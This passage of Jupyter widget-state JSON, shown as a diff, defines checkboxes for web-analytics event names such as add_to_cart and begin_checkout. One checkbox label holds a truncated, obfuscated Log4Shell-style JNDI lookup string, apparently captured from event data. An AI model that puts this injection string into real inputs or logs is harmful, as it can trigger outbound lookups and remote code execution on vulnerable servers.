"069ad5938cc44d1b98c0b715c120e2fb": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "video_play", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_d6ea703fef6a40648d33940ea0533477", + "style": "IPY_MODEL_674f1b434cc248398e785c641cccf6a3", + "value": false + } + }, + "29490473f86c4224b40f1bc14dcf4126": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "user_engagement", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_712af8b20d414f7eae375231b30ebf93", + "style": "IPY_MODEL_ff5753360adf4971b513dc197a10ba12", + "value": false + } + }, + "d76a2a87928a4feaa388e906e3dba5c0": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "session_start", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_472b0409a6784d7e8595d430074b4976", + "style": "IPY_MODEL_fbf924f270ad49b4ae7fe6d33f3de998", + "value": false + } + }, + "f106dfaad61d4048a9dee141dbfc70f8": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "select_promotion", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_e1869fb4d1a54d7b91db2a714bc8ab69", + "style": "IPY_MODEL_e99040a596774e35b013e07b97d59aa6", + "value": true + } + }, + "27093f0b59604748b47e1011ade33069": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "select_item", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_416e7a5741484457b37ee2cc6cb46769", + "style": "IPY_MODEL_5abc6dd6fc8a42cfac748645d7d5120d", + "value": false + } + }, + "b98edc06317d4ba68678baade932be80": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "scroll", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_f0571918d4964cb0a4e8c78b7dc5b81d", + "style": "IPY_MODEL_ee01fb5c76c6479a9764e8e8c7deeb24", + "value": true + } + }, + "7506fba59d244542a9f950d865375a7f": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "remove_from_cart", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_dd9432faf01e49f7b645575d9422a4df", + "style": "IPY_MODEL_b11bbb17f64a4cb88670c3251361abc1", + "value": false + } + }, + "0860bfa9645f406e81b47285a8c5ea94": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "page_view", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_008431306c25440584e45566ef6e2ef3", + "style": "IPY_MODEL_5b64a9e9922f406f8834ebac63a09ca8", + "value": false + } + }, + "7e36b5eab7b74d2fac02312aec136228": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "maj_purchase_propensity_vbb_30_15", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_682288ea4e1440d3974262dfffefc51a", + "style": "IPY_MODEL_8dfc8df4b9f241cf901c3fbb86554cd8", + "value": false + } + }, + "b18c8b6f127241458d6304b8e43d0b40": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "maj_purchase_propensity_30_15", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_68a0bbe8687e4db9b87542ef7023345f", + "style": "IPY_MODEL_70a89485f8eb4c9680ccdb6e20041f65", + "value": false + } + }, + "377fb1783fae4079a4406df02b6a2840": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "maj_cltv_180_30", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_6009ba22e5134b42a48038970f8a8087", + "style": "IPY_MODEL_25374e0a7ab5466bbcedf7cf15974c4f", + "value": false + } + }, + "09d4235a91e34e84b8b773cebc19a854": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "maj_churn_propensity_30_15", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_3be07a9a36c14e609506a8d2ac30439a", + "style": "IPY_MODEL_e43a24fb4e5c4fdcb39febd5fb66ab45", + "value": false + } + }, + "cd912a4adae54ba8a2c32dc01402c523": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "maj_audience_segmentation_15", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_13942a8909f945c395d55f92033505ff", + "style": "IPY_MODEL_51fc19877c544160ba1f98487b04d612", + "value": false + } + }, + "81fdbc9e894a4ba39f19eea43a6935f2": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "imported", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_eedd93a671824bde815adb53be8171d4", + "style": "IPY_MODEL_b02ed3fb150a4688b13ebcde50c08ffb", + "value": false + } + }, + "72eebc41731d4dafbd2a4528032bdf11": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "first_visit", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_e03e968d53544e44bb8aee7f544f1bb7", + "style": "IPY_MODEL_c4e4e8e3c9d748ffb96f74c1e7d06456", + "value": false + } + }, + "ce94c729917848e8b98b965163e4466b": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "errors", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_6e467383b0df416ea690cbd818bceba2", + "style": "IPY_MODEL_f4e0a99311504204a79f48de9ec95280", + "value": false + } + }, + "16031519618548678483de6e12dd3245": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "click", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_d8fffd09966f40cd8f443d6083121fbf", + "style": "IPY_MODEL_2fa658f90da941b6a590c278c67e548e", + "value": true + } + }, + "09fce7da46184625a657e076f89ffbad": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "begin_checkout", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_32a25d57545340c18731eb25a79e8b47", + "style": "IPY_MODEL_f0da6d221d02448bba7dc60802325cfd", + "value": false + } + }, + "fe4d60abead4406dbac0e54e6384f787": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "ads_conversion_Checkout_1", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_e17a16c5dc694b899e1e44f3be7583e5", + "style": "IPY_MODEL_bd92677245d34eaa9245935dd5a20932", + "value": false + } + }, + "fb03611950c8499a9078544ba5eeefa3": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "add_to_wishlist", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_4b9b4d011c1c4ccc886e6141ce25f235", + "style": "IPY_MODEL_74a8b740324c4efead37803b886a7921", + "value": true + } + }, + "d1d9f57fa9fa42d797325eed00664ed8": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "add_to_cart", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_56fcef4dc65e40e087bbb2821874af17", + "style": "IPY_MODEL_8673a30c6d5a4f419020438fd49b2859", + "value": true + } + }, + "2ff572bb94534bae8dfa5b61bb36adfd": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "add_shipping_info", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_346c028bf83344f6b6b4ac47d243a3f0", + "style": "IPY_MODEL_574170a8682d444abdb3a4762b7fc0e5", + "value": true + } + }, + "903f3582fe194b61b062f6575cadf380": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "add_payment_info", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_58b355bd18364678a41ca309605018a5", + "style": "IPY_MODEL_8f02fdb7148e4970b349c624f4bdf198", + "value": true + } + }, + "4da6287f1f5140228c1cbbe3e9873ea0": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "${jndi:dns://33${::-.}post${::-.}analyti", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_bf52704eb9744bc996a1f98bb2b1698d", + "style": "IPY_MODEL_a2855718cc134441a42da59e40da45b7", + "value": false + } + }, + "fc2e0535ede24be5a2b28ff37b307475": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": "repeat(3, 1fr)", + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "50a2eed8e87a4b3fbe4f7a31d5c54a5c": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "28580af1f9e54bbe99dd7ef9b3e1c7c0": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "f2e199b4f49d4beda16da275bad92312": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "2280d04b76b34456a3e0ebb257cbb58d": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "9e14f8ccc46a415382508d2f398801b1": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "6cc57addbbe3499fae8d82188d6cc466": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "2a36fd87b7e048ab80b41250b2444cff": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "6f80b1fdc1a645dda301f305c3fcfa3c": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "d5d5d1041afb49fba74e2010a8b517ef": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "df4a6c1954694ebd9078d2bbce331c0c": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "d6ea703fef6a40648d33940ea0533477": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "674f1b434cc248398e785c641cccf6a3": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "712af8b20d414f7eae375231b30ebf93": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "ff5753360adf4971b513dc197a10ba12": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "472b0409a6784d7e8595d430074b4976": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "fbf924f270ad49b4ae7fe6d33f3de998": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "e1869fb4d1a54d7b91db2a714bc8ab69": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "e99040a596774e35b013e07b97d59aa6": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "416e7a5741484457b37ee2cc6cb46769": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + 